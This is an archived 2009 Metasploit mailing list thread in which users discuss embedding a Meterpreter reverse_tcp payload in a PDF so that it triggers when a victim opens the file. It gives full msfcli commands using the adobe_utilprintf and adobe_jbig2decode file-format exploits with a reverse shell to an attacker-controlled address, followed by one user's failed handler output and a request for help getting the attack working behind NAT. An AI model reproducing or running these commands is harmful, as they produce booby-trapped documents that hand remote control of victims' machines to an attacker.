Metasploit mailing list archives

is it possible to attach metasploit payloads withpdf


From: wfdawson at bellsouth.net (wfdawson at bellsouth.net)
Date: Sun, 29 Mar 2009 20:14:05 +0000


 
 Hi,

I tried your suggestion.  I have a NAT'ed connection to the Internet where connections to my external address are 
mapped one-to-one to my internal address.  With the following:

./msfcli exploit/windows/fileformat/adobe_jbig2decode filename=test2.pdf payload=windows/meterpreter/reverse_tcp 
LHOST=x.x.x.x LPORT=443 E

...where x.x.x.x is my actual Internet visible IP address, I obtained the following response:

[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[-] Bind failed on 0.0.0.0
[*] Handler binding to LHOST x.x.x.x
[-] Bind failed on x.x.x.x
[-] Exploit failed: Cannot assign requested address - bind(2)

Is there a way to make this work in my situation?


 -------------- Original message from Mirko Iodice <m.iodice at gmail.com>: --------------


try:

./msfcli exploit/windows/fileformat/adobe_utilprintf
filename=document.pdf payload=windows/meterpreter/reverse_tcp
lhost=x.x.x.x lport=5555 E

2009/3/28 Abhishek Kumar :
hi list,

yesterday i was working around attaching a meterpreter reverse_tcp
payload to a MS word document.
It was simple to do because msfpayload provides payloads in VBA format.

Now,the question is...
is there anything available for pdf files ?> can we embed our payloads with pdf and then wait for the user to click 
on it 
??

regards
abhi
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




-- 
Mirko Iodice
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090329/24b1cff1/attachment.htm>


Current thread: